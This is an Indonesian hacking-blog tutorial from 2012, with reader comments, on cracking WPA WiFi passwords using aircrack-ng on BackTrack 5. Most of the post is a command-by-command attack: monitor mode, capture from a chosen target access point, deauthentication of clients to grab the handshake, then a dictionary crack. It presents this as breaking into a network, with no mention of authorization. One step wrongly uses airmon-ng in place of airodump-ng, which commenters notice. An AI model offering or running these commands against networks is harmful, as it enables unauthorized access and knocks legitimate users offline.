area
h4ck1n6
today : | at : | safemode : ON
> / home / facebook / twitter / exit /
name author perms com modified label

[CRACKING] Mendapatkan Password WiFi dengan Back|Track 5 Anonim rwxr-xr-x 6 01.12

Filename [CRACKING] Mendapatkan Password WiFi dengan Back|Track 5
Permission rw-r--r--
Author Anonim
Date and Time 01.12
Label
Action
Tutorial ini menjelaskan bagaimana cara mendapatkan password WiFi.

Note:
Tutorial ini dibuat di OS Back|Track 5 32 GNOME, dan juga bisa berjalan pada OS berbasis UNIX lainnya.


Preparation:
1. Aircrack, bisa di dapatkan di sini
2. Dictionary attack


Briefing
1. Hentikan semua proses yang menghambat jalannya aireplay
2. Simpan hasil monitoring
3. Lakukan aireplay untuk mendapatkan WPA Handshake
4. Crack hasil rekaman dengan dictionary attack
5. Gameover


Walkthrough




1. Hentikan semua proses yang menghambat jalannya aireplay

code:
root@red-dragon:/# airmon-ng check kill

2. Buat interface baru dengan mode monitor menggunakan airmon-ng

code:
root@red-dragon:/# airmon-ng start wlan0

3. Monitoring setiap akses poin yang ada di sekitar attacker

code:
root@red-dragon:/# airodump-ng mon0


4. Pilih target, kemudian Monitoring dan simpan hasil monitoring airodump.

code:
root@red-dragon:/# airmon-ng --write output --channel 6 --bssid 58:6D:8F:3D:55:E8 mon0

Keterangan:
1. --write : berfungsi untuk menyimpan hasil monitoring
2. output : nama hasil monitoring yang di simpan [bisa diisi bebas]
3. --chanel : channel akses poin target
4. --bssid : mac address akses poin

5. Jalankan aireplay-ng untuk mendapatkan WPA Handshake

code:
root@red-dragon:/# aireplay-ng --deauth 1 -a 58:6D:8F:3D:55:E8 -c E0:B9:A5:9D:18:94 mon0

Keterangan:
1. --deauth : berfungsi untuk deautentikasi setiap stasiun pada akses sebuah jaringan
2. -a : mac address akses poin
3. -c : mac address klien

Note:
Jika belum muncul WPA handshake, ganti mac address klien dengan yang lain.
code:
root@red-dragon:/# aireplay-ng --deauth 1 -a 58:6D:8F:3D:55:E8 -c 58:6D:8F:3D:55:E8 mon0

Jika aireplay berhasil, maka akan tampak seperti ini:


6. Jika sudah mendapatkan WPA handshake dari klien, langkah selanjutnya adalah menghentikan proses airodump-ng dengan menekan tombol ctrl + c, dan cracking password dengan aircrack-ng.
code:
root@red-dragon:/# aircrack-ng output-01.cap -w /root/crack wpa.txt

Keterangan
1. output-01.cap harus disesuaikan dengan nama hasil monitoring yang anda kehendaki pada tahap 4
2. -w adalah metode dictionary, diikuti dengan direktori dictionary milik anda.

Setelah selesai, maka akan tampak seperti ini:


7. Langkah selanjutnya adalah mengetes kebenaran dari metode ini


Jika berhasil, maka:


Created by: red-dragon
Supported by: aircrack-ng suite

Thanks to: Yoshephine Handini [For your love]
blue-dragon [for being the client in this tutorial]

6 komentar:

Anonymous mengatakan...

airmon-ng --write TPlink --channel 1 --bssid 54:E6:FC:D7:C0:98 mon0


usage: airmon-ng [channel or frequency]

tu ap artinya om...kok kyknya nggk ke save...ane udh search d lepi nggk ad hasil save nya????

doubledragon mengatakan...

Brother lagi run terminal di direktory apa? contoh:

root@red-dragon:/# airmon-ng --write output --channel 6 --bssid 58:6D:8F:3D:55:E8 mon0

berarti data yang di save ada di direktori root.

kalo

red-dragon@ubuntu:~$ airmon-ng --write output --channel 6 --bssid 58:6D:8F:3D:55:E8 mon0

berarti data di save di direktori home red-dragon..

=)

Anonymous mengatakan...

root om.....udh ane cri tpi nggk k save.....
trnyta pada command " --write " nggk ad printah urk mmbuat file...

stlh ane cba dgn

airodump-ng -w TPlink --bssid 54:E6:FC:D7:C0:98 -c 1 mon0

baru bisa ngesave.... :)

doubledragon mengatakan...

Kok saya pake --write bisa ya.. =T

Anonymous mengatakan...

kurang tw jga t om....ane pke --write nggk bsa.... tpi pke -w bsa......

doubledragon mengatakan...

Great! Yang penting kamu bisa menyimpan hasil capture airodump-ng

=)

Posting Komentar

 

http://area-hacking.blogspot.com
© 2012 `ekohaddy